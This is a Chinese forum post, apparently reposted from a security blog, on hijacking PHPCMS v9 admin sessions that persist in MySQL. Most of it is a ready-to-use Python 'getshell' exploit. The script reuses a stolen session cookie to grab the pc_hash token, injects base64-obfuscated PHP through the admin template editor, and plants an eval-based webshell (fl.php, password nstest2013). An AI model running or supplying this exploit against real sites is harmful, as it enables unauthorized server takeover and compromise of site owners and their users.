TA的每日心情 | 怒 2024-12-14 22:22 |
---|
签到天数: 1631 天 [LV.Master]伴坛终老
|
(在注入出的hash无法破解的情况下)
phpcmsv9在数据库中存储着session
- <?php
- return array(
- //网站路径
- 'web_path' => '/phpcms/install_package/',
- //Session配置
- 'session_storage' => 'mysql',
- 'session_ttl' => 1800,
- 'session_savepath' => CACHE_PATH.'sessions/',
- 'session_n' => 0,
- //Cookie配置
- 'cookie_domain' => '', //Cookie 作用域
- 'cookie_path' => '', //Cookie 作用路径
- 'cookie_pre' => 'MydlE_', //Cookie 前缀,同一域名下安装多套系统时,请修改Cookie前缀
- 'cookie_ttl' => 0, //Cookie 生命周期,0 表示随浏览器进程
- //模板相关配置
- 'tpl_root' => 'templates/', //模板保存物理路径
- 'tpl_name' => 'default', //当前模板方案目录
- 'tpl_css' => 'default', //当前样式目录
- 'tpl_referesh' => 1,
- 'tpl_edit'=>1,//是否允许在线编辑模板
复制代码 默认是mysql方式存储,session的有效期默认为30分钟。
/phpcms/libs/classes/session_mysql.class.php
查看源代码打印帮助
- public function __construct() {
- $this->db = pc_base::load_model('session_model');
- $this->lifetime = pc_base::load_config('system','session_ttl');
- session_set_save_handler(array(&$this,'open'), array(&$this,'close'), array(&$this,'read'), array(&$this,'write'), array(&$this,'destroy'), array(&$this,'gc'));
- session_start();
- }
- …….
- public function destroy($id) {
- return $this->db->delete(array('sessionid'=>$id));
- }
- /**
- * 删除过期的 session
- *
- * @param $maxlifetime 存活期时间
- * @return bool
- */
- public function gc($maxlifetime) {
- $expiretime = SYS_TIME - $maxlifetime;
- return $this->db->delete("`lastvisit`<$expiretime");
- }
- }
复制代码 这里只要触发了gc session就会被更新,如果超时了就删除。
来看看哪里会触发gc
/phpcms/modules/member/index.php
- private function _session_start() {
- $session_storage = 'session_'.pc_base::load_config('system','session_storage');
- pc_base::load_sys_class($session_storage);
- }
复制代码 前台注册 登录 后台登录都会触发gc操作。所以如果管理没有注销的情况,没人访问触发这些操作的情况下,就算过了半小时,session也不会消失,任然能拿shell。如果session无效,可以通过脚本20分钟监测一次,看是否有效,然后getshell。
Python写的getshell的脚本
- #! /usr/bin/env python
- import urllib2,re
- #code by 花开、若相惜
- #PaxMac Team
- url=raw_input('input your attack url: ')
- CmsCookie="PHPSESSID=18iigb6m80nrl1v7u5h53v7km3"#change here
- response = urllib2.Request(url+'/index.php?m=admin')
- response.add_header('Cookie',CmsCookie)
- response.add_header('User-Agent','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)')
- attck = urllib2.urlopen(response)
- #print attck.read()
- pattern = re.compile('pc_hash=\w{6}', re.I)
- match = pattern.search(attck.read())
- if match:
- hashkey=match.group()
- print "I Got pc_hash :"+hashkey
- attck.close()
- print "Start getshell..."
- data="code=%3C%3Fphp+fputs(fopen(base64_decode(ZmwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW25zdGVzdDIwMTNdKTsgPz4x))%3B%3F%3E%0D%0A%7Btemplate+\
- %27member%27%2C+%27header%27%7D%0D%0A%3Cdiv+id%3D%22memberArea%22%3E%0D%0A%7Btemplate+%27member%27%2C+%27left%27%7D%0D%0A%3Cdiv+class%3D%22\
- col-auto%22%3E%0D%0A%3Cdiv+class%3D%22col-1+%22%3E%0D%0A%3Ch6+class%3D%22title%22%3E%E6%B6%88%E8%B4%B9%E8%AE%B0%E5%BD%95%3C%2Fh6%3E%0D%0A%3Cdiv+\
- class%3D%22content%22%3E%0D%0A%3Cform+name%3D%22searchform%22+action%3D%22%7BAPP_PATH%7Dindex.php%3Fm%3Dpay%26c%3Dspend_list%26a%3Dinit%22+\
- method%3D%22get%22+%3E%0D%0A%3Cinput+type%3D%22hidden%22+value%3D%22pay%22+name%3D%22m%22%3E%0D%0A%3Cinput+type%3D%22hidden%22+\
- value%3D%22spend_list%22+name%3D%22c%22%3E%0D%0A%3Cinput+type%3D%22hidden%22+value%3D%22init%22+name%3D%22a%22%3E%0D%0A%09%09%3Cdiv+\
- class%3D%22search%22%3E%0D%0A%09%09%E8%AE%A2%E5%8D%95%E6%97%B6%E9%97%B4++%7Bform%3A%3Adate%28%27starttime%27%2Cformat%3A%3Adate%28%24starttime%29%29%7D\
- +%E5%88%B0+++%7Bform%3A%3Adate%28%27endtime%27%2Cformat%3A%3Adate%28%24endtime%29%29%7D%0D%0A%09%09%7Bform%3A%3A\
- select%28array%28%27%27%3D%3E%27%E6%B6%88%E8%B4%B9%E7%B1%BB%E5%9E%8B%27%2C+%271%27%3D%3E%27%E9%87%91%E9%92%B1%27%2C+%272%27%3D%3E%27%E7%A7%AF%E5%88%86%27%29%2C%24\
- type%2C%27name%3D%22type%22%27%29%7D++%0D%0A%09%09%3Cinput+type%3D%22submit%22+value%3D%22%E6%9F%A5%E8%AF%A2%22+class%3D%22button%22+name%3D%22\
- dosubmit%22%3E%0D%0A%09%09%3C%2Fdiv%3E%0D%0A%3C%2Fform%3E%0D%0A%3Ctable+width%3D%22100%25%22+cellspacing%3D%220%22++\
- class%3D%22table-list%22%3E%0D%0A++++++++%3Cthead%3E%0D%0A++++++++++++\
- %3Ctr%3E%0D%0A++++++++++++%3Cth+width%3D%2220%25%22%3E%E6%B6%88%E8%B4%B9%E5%86%85%E5%AE%B9%3C%2Fth%3E%0D%0A++++++++++++\
- %3Cth+width%3D%2220%25%22%3E%E6%97%B6%E9%97%B4%3C%2Fth%3E%0D%0A++++++++++++%3Cth+width%3D%2215%25%22%3E%E6%B6%88%E8%B4%B9%E7%B1%BB%E5%9E%8B%3C%2Fth%3E%0D%0A\
- ++++++++++++%3Cth+width%3D%228%25%22%3E%E6%95%B0%E9%87%8F%3C%2Fth%3E%0D%0A++++++++++++%3C%2Ftr%3E%0D%0A++++++++%3C%2Fthead%3E%0D%0A++++\
- %3Ctbody%3E%0D%0A%09%7Bloop+%24list+%24info%7D+%0D%0A%09%3Ctr%3E%0D%0A%09%3Ctd+width%3D%2220%25%22+align%3D%22center%22%3E%7B%24info%5B%27msg%27%5D%7D%3C\
- %2Ftd%3E%0D%0A%09%3Ctd++width%3D%2220%25%22+align%3D%22center%22%3E%7Bformat%3A%3Adate%28%24info%5B%27creat_at%27%5D%2C+1%29%7D%3C%2Ftd%3E%0D%0A%09%3Ctd+\
- width%3D%2215%25%22+align%3D%22center%22%3E%7Bif+%24info%5Btype%5D%3D%3D1%7D%E9%87%91%E9%92%B1%7Belseif+%24info%5Btype%5D%3D%3D2%7D%E7%A7%AF%E5%88%86%7B%2F\
- if%7D%3C%2Ftd%3E%0D%0A%09%3Ctd+width%3D%228%25%22+align%3D%22center%22%3E%7B%24info%5B%27value%27%5D%7D%3C%2Ftd%3E%0D%0A%09%3C%2Ftr%3E%0D%0A%09%7B%2Floop%7D%0D%0A\
- ++++%3C%2Ftbody%3E%0D%0A++++%3C%2Ftable%3E%0D%0A%0D%0A+%3Cdiv+id%3D%22pages%22%3E+%7B%24pages%7D%3C%2Fdiv%3E%0D%0A%3C%2Fdiv%3E%0D%0A%3Cspan+\
- class%3D%22o1%22%3E%3C%2Fspan%3E%3Cspan+class%3D%22o2%22%3E%3C%2Fspan%3E%3Cspan+class%3D%22o3%22%3E%3C%2Fspan%3E%3Cspan+class%3D%22o4%22%3E%3C%2Fspan%3E%0D%0A%3C%2F\
- div%3E%0D%0A%0D%0A%3C%2Fdiv%3E%0D%0A%3C%2Fdiv%3E%0D%0A%7Btemplate+%27member%27%2C+%27footer%27%7D%0D%0A&dosubmit=%E6%8F%90%E4%BA%A4&"+hashkey
- response = urllib2.Request(url+'/index.php?m=template&c=file&a=edit_file&style=default&dir=pay&file=spend_list.html',data)
- response.add_header('Cookie',CmsCookie)
- response.add_header('User-Agent','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)')
- attck = urllib2.urlopen(response)
- #print attck.read()
- attck.close()
- response = urllib2.Request(url+'/index.php?m=template&c=file&a=visualization&style=default&dir=pay&file=spend_list.html&'+hashkey)
- response.add_header('Cookie',CmsCookie)
- response.add_header('User-Agent','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)')
- attck = urllib2.urlopen(response)
- attck.close()
- try:
- response = urllib2.Request(url+'/fl.php')
- response.add_header('Cookie',CmsCookie)
- response.add_header('User-Agent','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)')
- attck = urllib2.urlopen(response)
- if str(attck.read())=="1":
- print "Webshell :"+url+'/fl.php'+" "+"password:nstest2013"
- else:
- print "Failed!"
- attck.close()
- except urllib2.HTTPError, e:
- print e.code
复制代码 作者:花开、若相惜
博主提醒:此Exp需要更改cookies,注册会员时需自行抓包 |
|